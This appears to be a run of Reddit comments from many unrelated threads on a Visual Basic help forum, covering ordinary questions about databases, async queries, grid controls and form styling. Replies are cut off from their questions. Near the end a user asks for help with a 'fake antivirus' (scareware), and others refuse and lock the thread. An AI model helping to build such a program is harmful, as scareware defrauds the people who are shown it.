This should help: https://weblogs.asp.net/ricardoperes/local-machine-interprocess-communication-with-net
This is more trouble than it's worth. Sorry. Frankly, I would just give the app a File/Open menu.
The app has that. We plan to embed hyperlinks on our web reports that will allow the applicable data to be loaded into the App upon a web page click. I have that part working. They click a link and the web page opens a data file for my app. Currently, they have to do a lot of back-and-forth to get review each data file versus the click of a link. 
Easy. This is built right into the VB application framework: 1. Open the project properties 2. Check "Make single instance application" 3. Client the "View Application Events" button 4. Add this code: Partial Friend Class MyApplication Protected Overrides Sub OnStartupNextInstance(eventArgs As StartupNextInstanceEventArgs) eventArgs.BringToForeground = True DoSomethingWith(eventArgs.CommandLine) End Sub End Class 
Yea... one checkbox and one event handler is so hard.
On behalf of your users I want to say thank you. These days far too many developers completely ignore basic UI affordances like this. Even if this was hard, it is worth doing because it makes the application that much easier to use.
Are you actually using .net 1.1?
Is TCP applicable to you? 
 Smtp.UseDefaultCredentials = True Smtp.Send(Mail)
Yup :) MDE 2003
Yes. I already use TCP within the app. It seems overkill to use TCP on the same PC.
The main reason I am stuck in 2003, my prior attempts to migrate were painful. It's a pretty large/diverse application with references to a bunch of old dlls, etc. Each attempt to migrate had me thrown in the towel after a day of my "pending tasks" was still growing.
You could always convert everything to base 10 first and then convert to other bases. e.g. `0x1A = 1 * 16^1 + A * 16^0 = 16 + 10 = 26 in base 10` `0o77 = 7 * 8^1 + 7 * 8^0 = 56 + 7 = 63 in base 10` `0b101 = 1 * 2^2 + 0 * 2^1 + 1 * 2^0 = 5 in base 10` 
Like `Format$(Date$, "yymmdd") &amp; "!"`, etc?
Don't store the ISBN as a number store it as a string. It will also make it easier to search on partials later on.
Thanks bone job. I tried to change to long text/deleted(on accident all the ISBN #’s I had entered) so the ISBN column is empty. I then went back into My VB project to try and reconnect but I’m still getting the same message. Any other ideas?
Can you paste your connection string here please.
Yep, that's a connection string. Looking at my code, I'm using "Provider=Microsoft.Jet.OLEDB.4.0" instead of "Provider=Microsoft.ACE.OLEDB.12.0". Here are some other options: https://www.connectionstrings.com/access/
I switched it to .Jet.OLEDB and I got : "Unrecognized database format 'E:\Capstone Project\Book List.accdb' " I'll try the others
Hey there! Once again, thanks for the help! However, I am, honestly, stumped on how to integrate it into the program. Could you please help me out (again)? (Sorry for bothering you.) [Here is the link, updated (I think).](https://github.com/JDebstup/ydl-GUI-VBNet)
Hey, just seeing this now... Getting home from happy hour. I'll be glad to take a look tomorrow, though! 
Thanks for your help Bonejob! I finally got it to work this morning. I wound up starting a new database and importing the info from the old one sans the Big int data type using the long text as you suggested. I also followed this: [link](https://msdn.microsoft.com/en-us/library/ms171893.aspx) Apparently trying to connect to Microsoft AccessDatabase File (OLE DB) as defaultly suggested, is for Access 2000-2003 .mdb Anyhow I’m sure I’ll be posting in the near future again so thanks again. 
The Default Date portion is just sending a CR, or a hitting the enter key. Apparently to choose the default date. For YYMMDD: Do Buffer = .ReadLine(OneSec) Loop Until InStr(Buffer, Prompt4) &gt; 0 .Transmit Now.ToString("yyMMdd") &amp; "!" &amp; CR .ReadLine() .Transmit Now.ToString("yyMMdd") &amp; "~" &amp; CR .ReadLine(OneSec) 
This is the perfect application to learn how databases work. You can start with a version of MS-SQL Express (which bonus is free) and your VS and you have all the product you need to start programming. If you want to go that way, i can offer you some further thoughts.
man I don't know there are so many resources on the net. just don't get confused betweeen mysql and MsSql.
You should start by posting the code and explaining what exactly isn't working. You should also state if the code you are posting is a shell that was given to you to complete or if it was started from scratch by you. You have never used VB and don't know what you are doing? Was this the first assignment on day 1 of the class? 
can you post the code you have already?
This is the first assignment and it's from scratch
&gt; If you want to go that way, i can offer you some further thoughts. Well you did offer assistance but that's cool. I was thinking that a database was a good option as well but I was looking for feedback. Your post appears to be more of an add than anything else. 
Fair enough. I'm curious tho, how you think it's an add. I'm not selling anything and the option I gave you (the MS-SQL Server) is a free download. Anyway, good luck with your project.
Because you showed up offering "some further thoughts" but the only substantive information you gave was that MS-SQL server was a free download. I try to take you up on some more detail and you tell me to do to google. I just don't understand what the point of your comment was if there is no further advice to give. I see a lot of people trying to get post and comment karma doing the same thing. 
The reason I didn't give any further advise was that I didn't know if you were open to trying a different approach and I wasn't going to waste my time typing something out if it wasn't going to be any help.
Where’s the code?. We can’t help you if you don’t help us by linking the code and we look at the code, see what you’re trying to do and guide you to achieve what you want. 
I should add- I've changed the four separate If blocks to one with three elseif's. Not sure what else to do.
It says your error is in Form1.vb and your screenshot is of that Gobel.vb file. Double click on the error and it’ll take you to where the error is. Usually with that error, it will underline where you’re missing a parentheses. I’m not sure I understand why the form1 load function is in that file vs Form1.vb file though, so maybe you’re doing something more advanced that I have no idea about.
good catch man I didn't even see it was a different code block.
Line 8
I’m going to make up some form and control names since yours aren’t shown. Also, on mobile. First, declare a public variable like Public rowID as integer in Form1 (form with data grid view) In the click event of the Edit link you should be able to use e.row to identify the row clicked. Set your public variable equal to e.row then Dim frm2 = New Form2(). In Form2 you can then reference that rowID to get info from the datagridview in Form1. Like me.textbox1.value = form1.datagridview1(Form1.rowID, 1).value.toString. (I’m 99% sure this is how you reference dgv cells, will verify once I’m on my laptop). This is how I work something similar in one of my apps. 
thanks for the response and help. but I'm not exactly sure how to use e.row
I would use a dropdown box for semester and a another for department. I would use a DataGridView to show the results of the query. Generally speaking, I like to start the development process with the User Interface first. Then move to the back end. By the time I'm ready to design the DB, I'd know I need a table for the department names and semester years and have them bound to the dropdown boxes.
Do not come here without code.
I've tracked the code down to messagebox.show(strReturnMessage) As I said my program tries to login and when it fails it returns the error in strReturnMessage. If the value of strReturnMessage isnot "True" then it runs the line: messagebox.show(strReturnMessage), as that messagebox appears so does the additional form..
Code, for at least the login form would be appreciated. Without it, no one can you help.
What type of arithmetic does the calculator have to be able to do? Is it just ASMD?
I figured it out!! Thank you!!
I figured it out!! Thank you!!
This post is off topic and locked.
Someone on here literally asked how to change the image in a PictureBox. If he took the 5 seconds to look at the PictureBox class the user would have found their answer as well for more information such as file locking and loading images from a stream. I am not a supporter of homework questions, but that is just me. The whole purpose of attending a computer science class is to learn the language and the material. Asking someone to do your homework or help on it doesn’t show me a true urge to want to learn. When I competed in computer programming which I placed 1st in the state of Ohio for VB and C# I didn’t ask around when I studied. I invested most of my time looking at the API, writing small programs, and looking at well written examples on CodeProject until I was comfortable. I did this because I wanted to learn, not because I wanted a good grade. If people can’t show an initiative on learning then I don’t think they can be helped. The will grow into being a script kiddy and quit after boredom.
No problem.
I'm not sure if you're being sarcastic. I don't even know what to look for, I don't know the terminology in this case. I've looked at this https://msdn.microsoft.com/en-us/vba/language-reference-vba/articles/understanding-visual-basic-syntax but it doesn't have what I'm looking for. 
I think relaxing might be a thing before you start shouting "Get off my lawn you stupid kids!" :D
(You will respect my authoritah.)[https://m.youtube.com/watch?v=XbebjUYItKw]
[.NET Framework reference source](https://referencesource.microsoft.com/) (does not contain some of the VB-specific helper assemblies) [dotPeek decompiler](https://www.jetbrains.com/decompiler/) (for the things you can't find in the reference source) [.NET Core runtime source](https://github.com/dotnet/coreclr) (For a few things that are implemented in C++ directly in the runtime. Probably inscrutable for most people.) I'm not sure what "application.tasks" is. Win32_ComputerSystem is part of the broader WMI API, which is interfaced with through COM under the hood.
I think one of the reasons we get the annoying homework question.. at least at my school.. was that the most basic business programming class (MIS Concentration) was VB.. MIS was known as the "lazy man's" computer science as all the upper level math was not required. This attracted a lot of people who had lots of misconceptions and misunderstandings of what actual programming is. 
&gt; You’re in school for a reason, you have a professor for a reason. There is an API for a reason. Check with your professor or actually look at the API for once, everything you need to get the wheels turning is in there. The only time you should post a question here is if you type it into Google and no results come up. Or you have searched both the API and Google for an hour each. Thank you! And then they get sulky and pissy when you tell them to "google it".
**Guess:** Check out the Tab field. Don't forget to escape your backslashes. Dim searcher As ManagementObjectSearcher = New ManagementObjectSearcher("SELECT * FROM Win32_PhysicalMedia where Tag = '\\\\.\\PHYSICALDRIVE0'")
It makes more sense when you put it that way. I don't really understand a lot of the parts involved here. Another guy shared a link that serves as some introduction. Thanks!
You may get a better answer by outlining what you are actually trying to accomplish.
Thanks! Updated.
So don’t use Google for what it was made for? I’m not understanding your argument as Google is a search engine, may I emphasize “search”. When programmers didn’t have Google what do you think they did? DOS and Windows 1 wasn’t built using the internet for answers. They were built by people who had the urge to want to learn programming. I think you feel as if I’m saying those who can’t use Google are shitty programmers. All I’m saying is that there is no need to ask questions about something that has documentation, it’s why it exists, specifically for those people.
&gt; en programmers didn’t have Google what do you think they did? DOS and Windows 1 wasn’t built using the internet for answers. They were built by people who had the urge to want to learn programming. I think you feel as if I’m saying those who can’t use Google are shitty programmers. All I’m saying is that there is no need to ask questions about someth my first programming language was Borland Pascal. What i'm saying is that people want to be spoon fed, they don't want to use their brain and figure things out. I'm saying that everyone starts out as a shitty programmer. You get good by learning how to program, looking at similar code and thinking like a programmer. Google is a great tool for programmers, and i'm saying that they don't want to use it, they want to be told the answer. I think we are arguing the same side. lol. And really if you (the generic you) can't use google, how do you expect to program? 
Oh shit we are arguing the same side. I’m sorry lol.
LOL I thought so. It was clear in my head. Must be an error between my keyboard and display.
this code does not seem to work for me. I always get the message type is not defined for DataGridViewCellEventArgs. but when I change that to something that works (e.g. GridViewRowEventArgs), the ColumnIndex and RowIndex says is not a member of EventArgs. also, CellContentClick does not seem to work, too, saying the event cannot be found.
Is this ASP? I was assuming you made just made a dolled up datagridview on a plain windows form. I have 0 experience with ASP, but I googled this. Protected Sub GridView1_RowCommand(sender As Object, e As GridViewCommandEventArgs) If e.CommandName = "Select" Then 'Determine the RowIndex of the Row whose Button was clicked. Dim rowIndex As Integer = Convert.ToInt32(e.CommandArgument) End If End Sub
Async is infectious. If you use one async function, every method that calls said function must also be async. All the way up the chain to your event handler. 
yeah, I'm sorry. this is ASP/VB.net connected to SQL Server database. anyway, I've managed to do it with your help, thanks to the ideas your codes gave me. I found and added some "find the row number" thing with my code. here's what I came up with. Protected Sub EditCust(ByVal sender As Object, ByVal e As EventArgs) Dim gvRow As GridViewRow = CType(CType(sender, Control).Parent.Parent, GridViewRow) Dim index As Integer = gvRow.RowIndex Dim ds As New DataTable Dim con As New SqlConnection con.ConnectionString = "Data Source=GERALD\SQLEXPRESS;Initial Catalog=DB_1;Integrated Security=True" con.Open() Dim CustInfo As New SqlDataAdapter("SELECT CustomerNo FROM ECustomerInfo", con) con.Close() CustInfo.Fill(ds) If ds.Rows.Count &gt; 0 Then Dim o As Integer = ds.Rows.Item(index).Item("CustomerNo").ToString() Response.Redirect("EditCustInfo.aspx?CustomerNo=" + o.ToString()) End If End Sub thanks for the help! 
Throughout my code, I’ll call this function for any query. So if I were to run a query off of a button click, the button click handler would need to be async as well as the actual function? Would this also mean that if the button called a function that then called this query function, that function and the button click would have to be async?
Actually, the more I read this, the more I think it’s as simple as wrapping my sub that handles the page load/queries inside of an async sub that awaits the “true” sub?
Look at the Mail class and by downloading the site are you talking about a PDF?
Yes, that is a viable option.
&gt; Public DBDA As SqlDataAdapter &gt; &gt; Public DBDT As DataTable &gt; &gt; Public DBDS As DataSet &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Don't do that. If you have two async operations at the same time, they'll stomp on each other. Instead, change your sub into a function, create local variables, and return the data table(s). That way each one gets it's own, private data table and adapter.
Just to let you know, Double clicking on the error brings you to it
Thanks for your help, I now have a spinning loading icon rather than a frozen screen. Another question for you: in one of your previous replies you mentioned the database calls are happening on my DBDA.Fill(DBDT) and DBDA.Fill(DBDS) in my class. Does this mean that for each query I pass through, I'm effectively querying it twice? When I'm writing, I tend to switch between referencing the datatable and dataset.tables(0) depending on whatever mood strikes me, but it sounds like I should just pick one to fill and delete the other.
please just post the code I need THXX
For anyone who comes looking for this later, below is the solution I put in place with grauenwolf's help. I still have a UI freeze when inserting the datatable into the HTML document, but I'm satisfied with having 3 seconds of spinning loading screen followed by a 1 second freeze instead of having a 4 second freeze of a non-loading screen. --No changes made to previously posted class used to execute queries. The below code is the relevant parts posted in the order they're called. --Document complete handler, passes the HTML document title and the webbrowser control into a navigation class that handles determining which calls should occur for the page Private Sub WebMain_DocumentCompleted(sender As Object, e As WebBrowserDocumentCompletedEventArgs) Handles WebMain.DocumentCompleted Nav.PageLoad(wb.DocumentTitle, WebMain) End Sub --PageLoad function to direct to wrapper sub Public wb As WebBrowser Public resultString As String = "" Public Sub PageLoad(page As String, target As WebBrowser) wb = target Select Case page Case "ExamplePage" Prm_Wrapper() End Select End Sub --Async sub to call "true" action sub. The InnerHTML of the element ID has to be updated here and not in the the sub being awaited because background workers cannot access UI elements since they are not running on the same thread. If you place the element update within the awaited sub, you will get a Invalid Cast Exception. Public Async Sub Prm_Wrapper() Await Task.Run(Sub() PromoPlanningLoad()) wb.Document.GetElementById("proplanning").InnerHtml = ResultString wb.Document.InvokeScript("proplanLoad") End Sub --True sub doing all the grunt work Public Sub PromoPlanningLoad() DGM.ExecQuery(promo_table) --promo_table is a public string variable holding the query resultString = DGM.DBDS.Tables(0).Rows(0)(0).ToString End Sub I may clean this up some so I'm not having to rely on the public variable resultString and instead just have the string returned as a function, but for the moment this is working well.
No.
I don't know for sure, but I think it is making two database calls. I don't remember anything about the data adapter being able to cache results. 
You should either Set shp = myDocument.Range.ShapeRange(1) or change your With statement to With myDocument.Range.ShapeRange(1) If your picture is an inline image, then instead of **.ShapeRange** I believe you have to reference the **.InlineShapes** collection.
Wait what? If you're making an anti virus program in VB you're doing it wrong... If you're making an anti virus program, I would think that what you're trying to accomplish would be trivial.. 
ye its a fake antivirus
something like this : https://youtu.be/2ICl5FwpH_o?t=2m31s
Video linked by /u/23edwa0123: Title|Channel|Published|Duration|Likes|Total Views :----------:|:----------:|:----------:|:----------:|:----------:|:----------: [SkyVast Anti-Virus 2012 - Fake Anti-Virus Made In Visual Basic 2010](https://youtu.be/2ICl5FwpH_o?t=2m31s)|Arvenas|2011-02-23|0:05:32|42+ (77%)|16,794 $quote SkyVast Anti-Virus 2012 Made in Visual Basic 2010. ... --- [^Info](https://np.reddit.com/r/youtubot/wiki/index) ^| [^/u/23edwa0123 ^can ^delete](https://np.reddit.com/message/compose/?to=_youtubot_&amp;subject=delete\%20comment&amp;message=$comment_id\%0A\%0AReason\%3A\%20\%2A\%2Aplease+help+us+improve\%2A\%2A) ^| ^v2.0.0
...I see. So you are asking us to help you create a program whose purpose is to defraud people? 
Post your code. 
https://codeshare.io/al9x9y 
From the rules: "Asking us to write it for you is not going to happen. We also reserve the right to not answer if we think you are just not trying."
If you don't like programming enough to do your homework then perhaps you're better suited for management.
Hey dude, I checked out your code. First of all, you're doing a lot of good stuff for a beginner. I like that you're naming all of your controls in a logical way (label being with lbl and textbox begins with txt). In order to make the changes you're asking about, you will need to update some of the properties on your label controls. You can access the properties a a control like this: lblYourLabel.SomeProperty = SomeValue Border Style can be changed like this: lblIdentity.BorderStyle = BorderStyle.Fixed3D Text Align can be changed like this lblIdentity.TextAlign = ContentAlignment.MiddleRight If you want this change to happen on form load then be sure to add the code in the Form1_Load Private Sub. So it would look like this Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load lblIdentity.BorderStyle = BorderStyle.Fixed3D lblIdentity.TextAlign = ContentAlignment.MiddleRight End Sub Of course, you're going to have to write these out for *every single label* and that gets old quick. If you'd like to make these changes to every label instead of a specific one you can use a loop to cycle through all the labels on a form. Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load 'This loops will iterate through each lable on your form. 'For each label the borderstyle and text align are updated For Each lbl As Label In Controls.OfType(Of Label) lbl.BorderStyle = BorderStyle.Fixed3D lbl.TextAlign = ContentAlignment.MiddleRight Next End Sub You can actually do this other other control types too besides label. Maybe you can try to figure that out on your own. Cheers!
Binding updates are attached to an event. In your case the only event it fires is the changing of the NumericUpDown. The easiest way to deal with this is to set you default value to 1 in your data class. The next easiest is to set the value manually in code. If somebody has figured out how to call the bind as a late bind to get the values from the form first I would love to know.
I'm curious to know if this will help. PartsPerBoxNumericUpDown.DataBindings("Value").ReadValue()
Would this work? PartsPerBoxNumericUpDown.DataBindings("Value").**Write**Value()
The only problem with the UI is that he's Fn around with data in files.
I had to pick this or c+ it’s like for a elective class nothing to do with what I’m studying for 
Well this would probably help you enough to know more about programming https://www.youtube.com/watch?v=9ylvKC8BBQA
This thread is locked we do not support this type of code here.
This thread is locked. We will not address questions like this.